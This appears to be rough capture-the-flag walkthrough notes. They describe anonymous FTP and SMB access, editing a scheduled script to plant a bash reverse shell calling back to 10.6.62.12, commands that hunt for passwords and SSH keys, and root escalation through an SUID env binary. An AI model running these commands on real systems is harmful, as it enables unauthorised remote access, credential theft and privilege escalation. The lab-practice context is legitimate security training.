we got into ftp anonymous, and we got into smb share.
there’s a script that runs on ftp that we can edit for reverse shell
reverse shell one liner:
Reverse Shell Cheat Sheet | pentestmonkey
bash -i >& /dev/tcp/10.6.62.12/7777 0>&1We get shell
sudo -l
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
history
find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
dpkg -l | grep nginx
getcap -r / 2>/dev/null
envSUID has a few. Check GTFOBins
env had it
/usr/bin/env /bin/bash -pwhat he did:
you can get a tty shell:
Spawning a TTY Shell | SecWiki (zacheller.dev)